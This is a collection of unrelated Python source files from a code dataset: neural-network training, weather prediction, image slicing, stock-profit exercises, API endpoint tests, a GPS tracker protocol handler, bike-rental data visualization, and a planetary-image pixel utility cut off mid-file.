1)\n\n# Set up variables\n#W = tf.Variable(tf.truncated_normal([num_hidden, int(ytrue.get_shape()[1])]))\n#bias = tf.Variable(tf.constant(0.1, shape=[target.get_shape()[1]]))\nW1 = tf.Variable(tf.truncated_normal([HIDDEN_UNITS, OUT_CELLS],stddev=0.1), name='W1')\nb1 = tf.Variable(tf.constant(0.1, shape=[OUT_CELLS]), name='b1')\nW2 = tf.Variable(tf.truncated_normal([OUT_CELLS, NCLASSES],stddev=0.1), name='W2')\nb2 = tf.Variable(tf.constant(0.1, shape=[NCLASSES]), name='b2')\n\nout1 = tf.nn.relu(tf.matmul(last, W1) + b1)\ny = tf.matmul(out1, W2) + b2\n\n# Define loss function\ncross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(y, ytrue))\n\n# Define how to train the model\ntrain_step = tf.train.AdamOptimizer(LEARN_RATE).minimize(cross_entropy)\n\n# Calculate Accuracy\ncorrect_prediction = tf.equal(tf.argmax(y,1), tf.argmax(ytrue,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n# Add ops to save all the variables.\n#saver = tf.train.Saver(write_version = tf.train.SaverDef.V1)\nsaver = tf.train.Saver()\n\n# Initialise the variables\ninit = tf.global_variables_initializer()\nwith tf.Session() as sess:\n sess.run(init)\n best_accuracy = 0\n\n # Run NUMITER minibatch updates\n for i in range(NUMITER):\n batch_xs, batch_ys = mnist.train.next_batch(BATCHSIZE)\n batch_xsb = binarize(np.expand_dims(batch_xs, axis=2))\n sess.run(train_step, feed_dict={x: batch_xsb, ytrue: batch_ys})\n if i % SNAP_INTERVAL == 0:\n snap = i//SNAP_INTERVAL \n train_accuracy[snap], train_crossent[snap] = sess.run([accuracy, cross_entropy],\n feed_dict={x: batch_xsb, ytrue: batch_ys})\n# starttime = time.time()\n for j in range(testbatches):\n test_acc_new, test_cross_new = sess.run([accuracy, cross_entropy],\n feed_dict={x: test_images[j*BATCHSIZE:(j+1)*BATCHSIZE],\n ytrue: mnist.test.labels[j*BATCHSIZE:(j+1)*BATCHSIZE]})\n test_accuracy[snap] += test_acc_new\n test_crossent[snap] += test_cross_new\n test_accuracy[snap] = test_accuracy[snap]/testbatches\n test_crossent[snap] = test_crossent[snap]/testbatches\n print('Train accuracy:', \"{:.1%}\".format(train_accuracy[snap]),\n ' Test accuracy:', \"{:.1%}\".format(test_accuracy[snap])) \n if test_accuracy[snap]>best_accuracy:\n best_accuracy = test_accuracy[snap]\n save_path = saver.save(sess, CHKPOINT)\n print(\"Model saved in file: %s\" % save_path) \n \n# endtime = time.time()\n# print('Time to calc test error:', \"{:.1f}\".format(endtime-starttime))\n\n # Calculate final test accuracy\n test_acc = 0\n test_cross = 0\n for j in range(testbatches):\n test_acc_new, test_cross_new = sess.run([accuracy, cross_entropy],\n feed_dict={x: test_images[j*BATCHSIZE:(j+1)*BATCHSIZE],\n ytrue: mnist.test.labels[j*BATCHSIZE:(j+1)*BATCHSIZE]})\n test_acc += test_acc_new\n test_cross += test_cross_new\n test_acc = test_acc/testbatches\n test_cross = test_cross/testbatches\n\n print('Final Test accuracy:', \"{:.1%}\".format(test_acc))\n \n # Save the variables to disk.\n# save_path = saver.save(sess, CHKPOINT)\n# print(\"Model saved in file: %s\" % save_path) \n\n# final_state = sess.run(state, feed_dict={x: batch_xsb, ytrue: batch_ys})\n# final_val = sess.run(val, feed_dict={x: batch_xsb, ytrue: batch_ys})\n# final_last = sess.run(last, feed_dict={x: batch_xsb, ytrue: batch_ys})\n# W1_tr, b1_tr, W2_tr, b2_tr = sess.run([W1,b1,W2,b2], feed_dict={x: batch_xsb, ytrue: batch_ys})\n\n # Calculate confusion matrix\n# y_pred, y_actu = sess.run([tf.argmax(y,1), tf.argmax(ytrue,1)],\n# feed_dict={x: mnist.test.images, ytrue: mnist.test.labels})\n# cm = confusion_matrix(y_actu, y_pred)\n\n # Plot the training and test errors during training\n trainline = plt.plot(np.arange(0,NUMITER,SNAP_INTERVAL), train_accuracy.T, linewidth=2)\n testline = plt.plot(np.arange(0,NUMITER,SNAP_INTERVAL), test_accuracy.T, linewidth=2)\n plt.legend(['Train Accuracy','Test Accuracy'])\n plt.title(\"Training RNN with 32-unit LSTM\")\n plt.show()\n\n# Save training hisotry to disk.\npickle.dump([train_accuracy, test_accuracy, train_crossent, test_crossent], open(PKLFILE, \"wb\"))\n","sub_path":"LSTM32_Training_AMI.py","file_name":"LSTM32_Training_AMI.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"21647157","text":"import pandas as pd\nfrom joblib import load\nimport datetime\n\ntry:\n # load_input_data\n data_mean = pd.read_csv('data/data_mean.csv')\n data_median = pd.read_csv('data/data_median.csv')\n\n # load the model\n clf = load('data/trained_model.joblib')\n\nexcept FileNotFoundError:\n import data_preprocessing\n\n # load_input_data\n data_mean = pd.read_csv('data/data_mean.csv')\n data_median = pd.read_csv('data/data_median.csv')\n\n # load the model\n clf = load('data/trained_model.joblib')\n\n\n# Define months with a dictionary\n\n\n# Making a function for prediction. Here we also use Python's 'datetime.datetime.strptime()' and\n# 'datetime.datetime.strftime()' to get a Month name and corresponding date.\ndef make_prediction(model, month, day):\n mean_input = pd.DataFrame(data_mean.query(f'month=={month}').query(f'day=={day}').mean())\n # mean_temp_min = round(float(mean_input.T[\"temp_min\"]), 2)\n # mean_temp_max = round(float(mean_input.T[\"temp_max\"]), 2)\n\n median_input = pd.DataFrame(data_median.query(f'month=={month}').query(f'day=={day}').median())\n # median_temp_min = round(float(median_input.T[\"temp_min\"]), 2)\n # median_temp_max = round(float(median_input.T[\"temp_max\"]), 2)\n\n prediction_day = datetime.datetime.strptime(str(month) + '/' + str(day), \"%m/%d\")\n\n try:\n mean_p = float(model.predict(mean_input.T))\n median_p = float(model.predict(median_input.T))\n print(\"*\"*35)\n print(f\" Predictions for {prediction_day.strftime('%B %d')}\")\n print(\"*\"*35)\n print(f\"Mean predicted temperature: {str(round(mean_p, 2))}°C\")\n print(\"~\"*40)\n print(f\"Median predicted temperature: {str(round(median_p, 2))}°C\")\n print(\"~\"*40)\n\n\n except ValueError:\n print(\"The combination of month and date is incorrect! Please type a correct month-day combination\")\n ask(clf)\n\n\ndef ask(model):\n while True:\n try:\n month = int(input(\"Please select a month (format: mm)\\n\"))\n\n if month not in range(1, 13):\n print(\"Incorrect input! Please enter a month number in 'mm' format between(1-12)\")\n continue\n if month in range(1, 13):\n break\n\n except ValueError:\n print(\"Incorrect input! Please enter a month number!\")\n continue\n\n while True:\n try:\n day = int(input(\"Please select a day (format: dd)\\n\"))\n\n if day not in range(1, 32):\n print(\"Incorrect input! Please enter a day number in 'dd' format between(1-31)\")\n continue\n if day in range(1, 32):\n break\n\n except ValueError:\n print(\"Incorrect input! Please enter a day number!\")\n continue\n\n make_prediction(model=model, month=month, day=day)\n\n\nif __name__ == '__main__':\n ask(clf)\n","sub_path":"temp_prediction_terminal.py","file_name":"temp_prediction_terminal.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"630452056","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport pdb\nimport config\nimport os\n\ndef cutImg(img_path, img_name):\n # img_path = './samplepic/sample1.jpg' # 图片路径\n img = cv2.imread(img_path)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # 用Sobel算子进行边缘识别\n detected_edges = cv2.Sobel(img, cv2.CV_64F, 0, 1)\n\n # 二值化识别图像\n m,n,l = detected_edges.shape\n matrixedges = np.zeros((m,n))\n\n matrixedges = np.sum(detected_edges, axis=2)\n matrixedges[matrixedges < 500] = 0\n matrixedges[matrixedges >= 500] = 255 \n\n # 保存识别图像\n # cv2.imwrite('matrixedges.png', matrixedges)\n\n # 计算每行高光像素的数量,分为十五组,求每组最大值和所在位置\n lineLightSum = np.sum(matrixedges,axis=1)//255\n lightSet = np.zeros((15, 2))\n for i in range(15):\n lightSet[i, 0] = np.argmax(lineLightSum[i*len(lineLightSum)//15:(i+1)*len(lineLightSum)//15]) + i*len(lineLightSum)//15\n lightSet[i, 1] = np.max(lineLightSum[i*len(lineLightSum)//15:(i+1)*len(lineLightSum)//15])\n\n #利用均值和距离进行排除\n mean = np.mean(lightSet[:, 1])\n lightSet = lightSet[lightSet[:, 1] > mean/2]\n i = 0\n while i < len(lightSet) - 1:\n if lightSet[i + 1, 0] - lightSet[i, 0] <= m/15:\n deleteIndex = np.argmin(lightSet[i:i+2, 1])\n lightSet = np.delete(lightSet, i+deleteIndex, axis=0)\n else:\n i += 1\n\n #保存切条后的图片\n lightSet = np.delete(lightSet, 1 ,axis=1)\n if lightSet[0] > 200:\n lightSet = np.insert(lightSet, 0, 0, axis=0)\n if lightSet[-1] < m - 200:\n lightSet = np.append(lightSet, m-1)\n\n for index in range(1, len(lightSet)):\n tempimagename = os.path.join(\n config.IMAGE_AFTER_PROCESS_DIR, img_name[:img_name.find('.jpg')] + str(index) + '.jpg')\n cv2.imwrite(tempimagename, img[int(lightSet[index - 1]):int(lightSet[index])])\n \n return len(lightSet) - 1\n ","sub_path":"BackEnd/cutImg.py","file_name":"cutImg.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"192033441","text":"#!/usr/bin/python\n\nimport argparse\n\n\ndef find_max_profit(prices):\n # First attempt - naive approach\n # First find a low price to buy at\n # lowest_price_index = 0\n # for current_index in range(1, len(prices) - 1):\n # if prices[current_index] < prices[lowest_price_index]:\n # lowest_price_index = current_index\n #\n # # Next find a high price (that comes later) to sell at\n # highest_following_price_index = 0\n # for current_index in range(lowest_price_index, len(prices) - 1):\n # if prices[current_index] > prices[highest_following_price_index]:\n # highest_following_price_index = current_index\n #\n # # Find the difference of the prices to find the profit\n # profit = prices[highest_following_price_index] - prices[lowest_price_index]\n # return profit\n\n # Second attempt - Brute force\n # best_profit = 0\n # for i in range(0, len(prices) - 1):\n # for j in range(i, len(prices) - 1):\n # if prices[j] - prices[i] > best_profit:\n # best_profit = prices[j] - prices[i]\n # if best_profit == 0:\n # return -10\n # return best_profit\n\n # Third attempt - improved naive approach\n lowest_price_index = 0\n highest_price_index = 1\n profit = prices[highest_price_index] - prices[lowest_price_index]\n\n for i in range(1, len(prices) - 1):\n if prices[i] < prices[lowest_price_index]:\n lowest_price_index = i\n if prices[i] > prices[highest_price_index]:\n highest_price_index = i\n if highest_price_index > lowest_price_index:\n profit = prices[highest_price_index] - prices[lowest_price_index]\n return profit\n else:\n highest_price_index = lowest_price_index\n for i in range(lowest_price_index + 1, len(prices)):\n if prices[i] > prices[highest_price_index]:\n highest_price_index = i\n return profit\n\n\n\nif __name__ == '__main__':\n # This is just some code to accept inputs from the command line\n parser = argparse.ArgumentParser(description='Find max profit from prices.')\n parser.add_argument('integers', metavar='N', type=int, nargs='+', help='an integer price')\n args = parser.parse_args()\n\n print(\"A profit of ${profit} can be made from the stock prices {prices}.\".format(\n profit=find_max_profit(args.integers), prices=args.integers))\n","sub_path":"stock_prices/stock_prices.py","file_name":"stock_prices.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"240166452","text":"# pylint: disable=no-self-use\n# - pylint test classes must pass self, even if unused.\n# pylint: disable=invalid-name\n# - this module has some pretty verbose names,\n# shrinking them feels worse than disabling this lint.\n# pylint: disable=logging-fstring-interpolation\n# - honestly just annoying to use lazy(%) interpolation.\n\"\"\"\nEndpoint tests for registering events.\n\"\"\"\nimport logging\nfrom typing import Dict, Any\n\nfrom fastapi.testclient import TestClient\nfrom requests.models import Response as HTTPResponse\n\nfrom app import app\nimport models.events as event_models\n\nclient = TestClient(app)\n\n\ndef check_event_registration_response_valid(response: HTTPResponse) -> bool:\n \"\"\"\n Returns the boolean status of the validity of the raw\n http server response.\n \"\"\"\n try:\n assert response.status_code == 201\n assert response.json()\n return True\n except AssertionError as assert_error:\n debug_msg = f\"failed at: {assert_error}. resp json: {response.json()}\"\n logging.debug(debug_msg)\n return False\n\n\ndef get_reg_event_endpoint_url_str() -> str:\n \"\"\"\n Returns the endpoint url string\n \"\"\"\n return \"/events/register\"\n\n\ndef get_json_from_event_reg_form(\n event_form: event_models.EventRegistrationForm) -> Dict[str, Any]:\n \"\"\"\n Creates and returns a valid json payload from an event registration form\n \"\"\"\n json_dict = event_form.dict()\n return json_dict\n\n\ndef get_invalid_json_from_reg_form(\n event_form: event_models.EventRegistrationForm) -> Dict[str, Any]:\n \"\"\"\n Takes a valid event form object and returns an invalid json payload from it\n \"\"\"\n event_dict = event_form.dict()\n # make data dirty by reversing the order of values with their keys\n values = list(event_dict.values())[::-1]\n for key, value in zip(event_dict.keys(), values):\n event_dict[key] = value\n return event_dict\n\n\nclass TestRegisterEvent:\n def test_register_event_success(\n self, event_registration_form: event_models.EventRegistrationForm):\n \"\"\"\n Attempts to register a valid event, expecting success.\n \"\"\"\n event_form_json = get_json_from_event_reg_form(event_registration_form)\n\n endpoint_url = get_reg_event_endpoint_url_str()\n event_response = client.post(endpoint_url, json=event_form_json)\n assert check_event_registration_response_valid(event_response)\n\n def test_register_event_no_data_failure(self):\n \"\"\"\n Tries to register an event while sending no data,\n expecting failure.\n \"\"\"\n empty_event_form = {}\n\n endpoint_url = get_reg_event_endpoint_url_str()\n event_response = client.post(endpoint_url, json=empty_event_form)\n\n assert not check_event_registration_response_valid(event_response)\n assert event_response.status_code == 422\n\n def test_register_event_bad_data_failure(\n self, event_registration_form: event_models.EventRegistrationForm):\n \"\"\"\n Tries to register an event with a faulty piece of data,\n expecting a 422 failure.\n \"\"\"\n invalid_event_json = get_invalid_json_from_reg_form(\n event_registration_form)\n\n endpoint_url = get_reg_event_endpoint_url_str()\n event_response = client.post(endpoint_url, json=invalid_event_json)\n\n assert not check_event_registration_response_valid(event_response)\n assert event_response.status_code == 422\n","sub_path":"tests/test_event_registration.py","file_name":"test_event_registration.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"355415026","text":"# -*- coding: utf8 -*-\n'''\n@project Maprox Observer \n@info Протокол AGIS-V1\n@copyright 2009-2011 © Maprox Ltd.\n@author sunsay \n@link $HeadURL: http://vcs.maprox.net/svn/observer/Server/trunk/lib/listeners/agis/v1.py $\n@version $Id: v1.py 404 2011-02-24 22:16:22Z sunsay $\n'''\n\nimport re\nfrom datetime import datetime\n\nfrom kernel.logger import log\nfrom kernel.config import conf\nfrom lib.handler import AbstractHandler\n\n# Регулярное выражение, которому должна соответствовать каждая\n# запись, переданная модемом нашему серверу\nregex = '^(\\d+)\\|(\\d{4})\\|' # идентификатор, код сообщения\nregex += '(\\d+\\.\\d+)\\|(N|S|W|E)\\|' # широта\nregex += '(\\d+\\.\\d+)\\|(N|S|W|E)\\|' # долгота\nregex += '(\\d+\\.\\d+)\\|(\\d+\\.\\d+)\\|' # скорость, азимут\nregex += '(\\d{6})\\|(\\d+\\.?\\d+)\\|' # дата, время посылки\n\nregexCoord = '(\\d{2,})(\\d{2}.\\d{2,})' # координаты протокола A-GIS v1\n\nclass Handler(AbstractHandler):\n 'AGIS. v1'\n\n def __init__(self, store = None):\n 'Инициализация объекта. Создаем объект работы с хранилищем'\n Listener.__init__(self, store)\n\n def dispatch(self, clientThread):\n 'Обработка данных, поступивших от модема'\n Listener.dispatch(self, clientThread)\n data = clientThread.request.recv(conf.initDataCount)\n while len(data) > 0:\n matchObj = re.match(regex, data.decode());\n self.store(matchObj)\n data = clientThread.request.recv(4096)\n\n def coordCalc(self, coord, letter):\n mo = re.match(regexCoord, coord)\n result = str(int(mo.group(1)))\n result += str(float(mo.group(2)) / 60)[1:]\n if (letter.upper() == 'W' or letter.upper() == 'S'):\n result = '-' + result\n return result\n\n def store(self, matchObject):\n \"\"\"Сохранение обработанных данных в хранилище\"\"\"\n log.debug('%s::store()', self.__class__)\n try:\n mo = matchObject\n packet = dict()\n packet['uid'] = mo.group(1)\n packet['latitude'] = self.coordCalc(mo.group(3), mo.group(4))\n packet['longitude'] = self.coordCalc(mo.group(5), mo.group(6))\n packet['code'] = mo.group(2)\n packet['speed'] = mo.group(7)\n packet['azimuth'] = mo.group(8)\n # вычисляем время\n timeStr = matchObject.group(9) + ' ' + matchObject.group(10)\n dt = datetime.strptime(timeStr, '%d%m%y %H%M%S.%f')\n packet['time'] = dt.strftime('%Y-%m-%dT%H:%M:%S.%f')\n self.send([packet])\n # закрываем соединение\n except Exception as E:\n log.error(E)\n","sub_path":"server/china/lib/handlers/agis/v1.py","file_name":"v1.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"425913252","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 1 14:43:09 2017\r\n\r\n@author: MainPc\r\n\"\"\"\r\n#import library\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sn\r\nimport numpy as np\r\nimport calendar\r\nfrom datetime import datetime\r\nfrom scipy import stats\r\n\r\n#read dataset\r\ntrain = pd.read_csv(\"c:/train.csv\")\r\ntest = pd.read_csv(\"c:/test.csv\")\r\n\r\n#dataset description\r\nprint(train.shape)\r\nprint(test.shape)\r\nprint(train.head(3))\r\n\r\ntrain.info()\r\ntest.info()\r\n\r\n#data sidtribution\r\nfig,ax1 = plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.boxplot(data=train,y=\"count\",orient=\"v\",ax=ax1)\r\nax1.set(ylabel='Number of Bike Rental (Hourly)',title=\"Count\")\r\n\r\n#remove outliers\r\nnewtrain = train[np.abs(train[\"count\"]-train[\"count\"].mean())<=(3*train[\"count\"].std())] \r\nprint (\"Shape Before Ouliers: \",train.shape)\r\nprint (\"Shape After Ouliers: \",newtrain.shape)\r\n\r\n#datetime decomposition\r\nnewtrain[\"date\"] = newtrain.datetime.apply(lambda x : x.split()[0])\r\nnewtrain[\"hour\"] = newtrain.datetime.apply(lambda x : x.split()[1].split(\":\")[0])\r\nnewtrain[\"weekday\"] = newtrain.date.apply(lambda dateString : calendar.day_name[datetime.strptime(dateString,\"%Y-%m-%d\").weekday()])\r\nnewtrain[\"month\"] = newtrain.date.apply(lambda dateString : calendar.month_name[datetime.strptime(dateString,\"%Y-%m-%d\").month])\r\nnewtrain = newtrain.drop([\"datetime\"],axis=1)\r\n\r\n#data visualization\r\nlists = ['hour', 'weekday', 'month']\r\nfor i, name in enumerate(lists):\r\n plt.subplot(3,1,i+1)\r\n sn.countplot(name,data=newtrain) \r\nplt.show()\r\n\r\nfig,ax2 = plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.barplot(data=newtrain,y=\"count\",x=\"hour\",orient=\"v\",ax=ax2)\r\nax2.set(ylabel='Number of Bike Rental (Hourly) ',title=\"Hour\")\r\n\r\nfig,ax3 = plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.barplot(data=newtrain,y=\"count\",x=\"weekday\",orient=\"v\",ax=ax3)\r\nax3.set(ylabel='Number of Bike Rental (Hourly) ',title=\"Weekday\")\r\n\r\nfig,ax4 = plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.barplot(data=newtrain,y=\"count\",x=\"month\",orient=\"v\",ax=ax4)\r\nax4.set(ylabel='Number of Bike Rental (Hourly) ',title=\"Month\")\r\n\r\nfig,ax5 = plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.countplot(newtrain['holiday'],ax=ax5)\r\nax5.set(xlabel='Holiday', ylabel='Count',title=\"Holiday\")\r\n\r\nfig,ax6 = plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.countplot(newtrain['workingday'],ax=ax6)\r\nax6.set(xlabel='Working Day', ylabel='Count',title=\"Working Day\")\r\n\r\nfig,ax7 = plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.barplot(data=newtrain,y=\"count\",x=\"workingday\",orient=\"v\",ax=ax7)\r\nax7.set(ylabel='Number of Bike Rental (Hourly) ',title=\"Working Day\")\r\n\r\nfig,ax14 = plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.boxplot(data=newtrain,y=\"count\",x=\"weather\",orient=\"v\",ax=ax14)\r\nax14.set(ylabel='Number of Bike Rental (Hourly) ',title=\"Weather\")\r\n\r\nfig,(ax8,ax9) = plt.subplots(nrows=2)\r\nfig.set_size_inches(8, 5)\r\nsn.countplot(newtrain['temp'],ax=ax8)\r\nax8.set( ylabel='Count',title=\"Temperature\")\r\nsn.regplot(x=\"temp\", y=\"count\", data=newtrain,ax=ax9)\r\n\r\nfig,(ax10,ax11) = plt.subplots(nrows=2)\r\nfig.set_size_inches(8, 5)\r\nsn.countplot(newtrain['atemp'],ax=ax10)\r\nax10.set( ylabel='Count',title=\"Apparent Temperature\")\r\nsn.regplot(x=\"atemp\", y=\"count\", data=newtrain,ax=ax11)\r\n\r\nfig,(ax11,ax12) = plt.subplots(nrows=2)\r\nfig.set_size_inches(8, 5)\r\nsn.countplot(newtrain['windspeed'],ax=ax11)\r\nax10.set( ylabel='Count',title=\"Windspeed\")\r\nsn.regplot(x=\"windspeed\", y=\"count\", data=newtrain,ax=ax12)\r\n\r\nfig,(ax12,ax13) = plt.subplots(nrows=2)\r\nfig.set_size_inches(8, 5)\r\nsn.countplot(newtrain['humidity'],ax=ax12)\r\nax12.set( ylabel='Count',title=\"Humidity\")\r\nsn.regplot(x=\"humidity\", y=\"count\", data=newtrain,ax=ax13)\r\n\r\ncorrelation = newtrain[[\"temp\",\"humidity\",\"windspeed\",\"casual\",\"registered\",\"count\"]].corr()\r\nmask = np.array(correlation)\r\nmask[np.tril_indices_from(mask)] = False\r\nfig,ax= plt.subplots()\r\nfig.set_size_inches(15,10)\r\nsn.heatmap(correlation, mask=mask,vmax=.8, square=True,annot=True)\r\n\r\nfig,ax15 = plt.subplots(ncols=2,nrows=2)\r\nfig.set_size_inches(15, 10)\r\nsn.distplot(train[\"count\"],ax=ax15[0][0])\r\nstats.probplot(train[\"count\"], dist='norm', fit=True, plot=ax15[0][1])\r\nsn.distplot(np.log(newtrain[\"count\"]),ax=ax15[1][0])\r\nstats.probplot(np.log1p(newtrain[\"count\"]), dist='norm', fit=True, plot=ax15[1][1])\r\n\r\nfig,month = plt.subplots()\r\nfig.set_size_inches(15,10)\r\nhourAggregated = pd.DataFrame(newtrain.groupby([\"hour\",\"month\"],sort=True)[\"count\"].mean()).reset_index()\r\nsn.pointplot(x=hourAggregated[\"hour\"], y=hourAggregated[\"count\"],hue=hourAggregated[\"month\"], data=hourAggregated, join=True,ax=month)\r\nmonth.set(xlabel='Hour Of The Day', ylabel='Number of Bike Rental',title=\"Nmumber Of Bike Rental By Hour Of The Day Across Month\",label='big')\r\n\r\nfig,weekday = plt.subplots()\r\nfig.set_size_inches(15,10)\r\nhueOrder = [\"Sunday\",\"Monday\",\"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\"]\r\nhourAggregated = pd.DataFrame(newtrain.groupby([\"hour\",\"weekday\"],sort=True)[\"count\"].mean()).reset_index()\r\nsn.pointplot(x=hourAggregated[\"hour\"], y=hourAggregated[\"count\"],hue=hourAggregated[\"weekday\"],hue_order=hueOrder, data=hourAggregated, join=True,ax=weekday)\r\nweekday.set(xlabel='Hour Of The Day', ylabel='Number of Bike Rental',title=\"Nmumber Of Bike Rental By Hour Of The Day Across Weekdays\",label='big')\r\n\r\nfig,user = plt.subplots()\r\nfig.set_size_inches(15,10)\r\nhourTransformed = pd.melt(newtrain[[\"hour\",\"casual\",\"registered\"]], id_vars=['hour'], value_vars=['casual', 'registered'])\r\nhourAggregated = pd.DataFrame(hourTransformed.groupby([\"hour\",\"variable\"],sort=True)[\"value\"].mean()).reset_index()\r\nsn.pointplot(x=hourAggregated[\"hour\"], y=hourAggregated[\"value\"],hue=hourAggregated[\"variable\"],hue_order=[\"casual\",\"registered\"], data=hourAggregated, join=True,ax=user)\r\nuser.set(xlabel='Hour Of The Day', ylabel='Number of Bike Rental',title=\"Nmumber Of Bike Rental By Hour Of The Day Across User Type\",label='big')\r\n\r\n#remove unnecessary features\r\ndataset = train.drop([\"datetime\", 'season', 'holiday', 'atemp' ,'windspeed', 'casual', 'registered', 'count'],axis=1)\r\nprint(dataset.dtypes)","sub_path":"Data Visualization.py","file_name":"Data Visualization.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"599435665","text":"\"\"\"This module contains wrappers around the ISIS campt and mappt that are\nspecific to understanding the relationship between pixels and projected\ncoordinates.\"\"\"\n\n# This is free and unencumbered software released into the public domain.\n#\n# The authors of autocnet do not claim copyright on the contents of this file.\n# For more details about the LICENSE terms and the AUTHORS, you will\n# find files of those names at the top level of this repository.\n#\n# SPDX-License-Identifier: CC0-1.0\n\nimport os\nfrom collections import abc\nfrom numbers import Number\n\nimport numpy as np\n\ntry:\n import kalasiris as isis\nexcept Exception as exception:\n from autocnet.utils.utils import FailedImport\n isis = FailedImport(exception)\n\nimport pvl\n\nisis2np_types = {\n \"UnsignedByte\" : \"uint8\",\n \"SignedWord\" : \"int16\",\n \"Double\" : \"float64\",\n \"Real\" : \"float32\"\n}\n\nnp2isis_types = {v: k for k, v in isis2np_types.items()}\n\n\ndef get_isis_special_pixels(arr):\n \"\"\"\n Returns coordinates of any ISIS no data pixels. Essentially, \n np.argwhere results of where pixels match ISIS special \n data types (NIRs, NHRs, HIS, HRS, NULLS).\n\n Parameters\n ----------\n arr : np.array \n Array to find special pixels in \n \n Returns\n -------\n : sp\n np.array of coordinates in y,x format containing special pixel coordinates\n\n \"\"\"\n isis_dtype = np2isis_types[str(arr.dtype)]\n sp_pixels = getattr(isis.specialpixels, isis_dtype)\n\n null = np.argwhere(arr==sp_pixels.Null)\n lrs = np.argwhere(arr==sp_pixels.Lrs)\n lis = np.argwhere(arr==sp_pixels.Lis)\n his = np.argwhere(arr==sp_pixels.His)\n hrs = np.argwhere(arr==sp_pixels.Hrs)\n sp = np.concatenate((null, lrs, lis, his, hrs))\n\n return sp\n\n\ndef get_nodata_bounds(arr):\n \"\"\"\n Get bounds for an image that does not contain any ISIS special pixels. That is,\n ISIS Nulls, NIRS, NRS, HIS and HRS pixels\n\n Parameters\n ----------\n arr : np.array\n 2D array representing the image \n\n Returns\n -------\n : left_x \n left x coordinate of new bounds \n\n : right_x\n right x coordinate of new bounds \n \n : top_y\n top y coordinate of new bounds \n \n : bottom _y\n bottom y coordinates of new bounds \n \"\"\"\n sp = get_isis_special_pixels(arr)\n \n if not sp.any():\n return 0, arr.shape[1], 0, arr.shape[0]\n \n cy, cx = arr.shape[1]//2, arr.shape[0]//2\n tree = KDTree(sp, metric='euclidean')\n\n # For finding K neighbors of P1 with shape (1, 3)\n distances, indices = tree.query(np.array([cy, cx]).reshape(1,2), 1)\n \n # these are slightly misshapen by being in nested arrays (e.g. [[n]], [[y,x]])\n nearest_idx = indices.reshape(1,)\n neary, nearx = sp[nearest_idx].reshape(2,)\n\n # subtract 1 to exclude the special pixel\n x_dist = abs(cx - nearx) - 1\n y_dist = abs(cy - neary) - 1\n\n # left_x, right_x, top_y, bottom_y\n left_x = cx - x_dist\n right_x = cx + x_dist\n top_y = cy - y_dist\n bottom_y = cy + y_dist\n\n return left_x, right_x, top_y, bottom_y\n\n\ndef point_info(\n cube_path: os.PathLike,\n x,\n y,\n point_type: str,\n allowoutside=False\n):\n \"\"\"\n Returns a pvl.collections.MutableMappingSequence object or a\n Sequence of MutableMappingSequence objects which contain keys\n and values derived from the output of ISIS campt or mappt on\n the *cube_path*.\n\n If x and y are single numbers, then a single MutableMappingSequence\n object will be returned. If they are Sequences or Numpy arrays, then a\n Sequence of MutableMappingSequence objects will be returned,\n such that the first MutableMappingSequence object of the returned\n Sequence will correspond to the result of *x[0]* and *y[0]*,\n etc.\n\n Raises subprocess.CalledProcessError if campt or mappt have failures.\n May raise ValueError if campt completes, but reports errors.\n\n Parameters\n ----------\n cube_path : os.PathLike\n Path to the input cube.\n\n x : Number, Sequence of Numbers, or Numpy Array\n Point(s) in the x direction. Interpreted as either a sample\n or a longitude value determined by *point_type*.\n\n y : Number, Sequence of Numbers, or Numpy Array\n Point(s) in the y direction. Interpreted as either a line\n or a latitude value determined by *point_type*.\n\n point_type : str\n Options: {\"image\", \"ground\"}\n Pass \"image\" if x,y are in image space (sample, line) or\n \"ground\" if in ground space (longitude, latitude)\n\n allowoutside: bool\n Defaults to False, this parameter is passed to campt\n or mappt. Please read the ISIS documentation to\n learn more about this parameter.\n\n \"\"\"\n point_type = point_type.casefold()\n valid_types = {\"image\", \"ground\"}\n if point_type not in valid_types:\n raise ValueError(\n f'{point_type} is not a valid point type, valid types are '\n f'{valid_types}'\n )\n\n if isinstance(x, abc.Sequence) and isinstance(y, abc.Sequence):\n if len(x) != len(y):\n raise IndexError(\n f\"Sequences given to x and y must be of the same length.\"\n )\n x_coords = x\n y_coords = y\n elif isinstance(x, Number) and isinstance(y, Number):\n x_coords = [x, ]\n y_coords = [y, ]\n elif isinstance(x, np.ndarray) and isinstance(y, np.ndarray):\n if not all((x.ndim == 1, y.ndim == 1)):\n raise IndexError(\n f\"If they are numpy arrays, x and y must be one-dimensional, \"\n f\"they were: {x.ndim} and {y.ndim}\"\n )\n if x.shape != y.shape:\n raise IndexError(\n f\"Numpy arrays given to x and y must be of the same 